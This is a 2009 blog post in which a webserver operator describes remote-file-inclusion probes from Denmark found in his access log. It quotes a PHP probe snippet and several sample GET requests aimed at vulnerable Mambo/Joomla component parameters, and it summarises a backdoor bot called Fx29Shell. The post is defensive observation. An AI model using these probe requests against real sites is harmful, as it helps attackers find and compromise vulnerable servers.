Somebody in Denmark thought something in ... / 2009-11-19

2009-11-19 Somebody in Denmark thought something in ... 9 years ago
Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:
$ grep -c ~httpd/idefix/logs/access_log
All tries to display which is a bit of PHP source:
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Which will display ShiroHige as one word when run through the php processor.

All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0D
GET /~koos//?mosConfig_absolute_path=%0D
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0D
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0D
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0D
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0D
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0D
A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

Subject: Fx29Shell by

Boss, there was an injected target on by
Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on it's probably a script running on that server which got hacked from a third place.

Tags: ,

, reachable as PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated in 0.004313 seconds.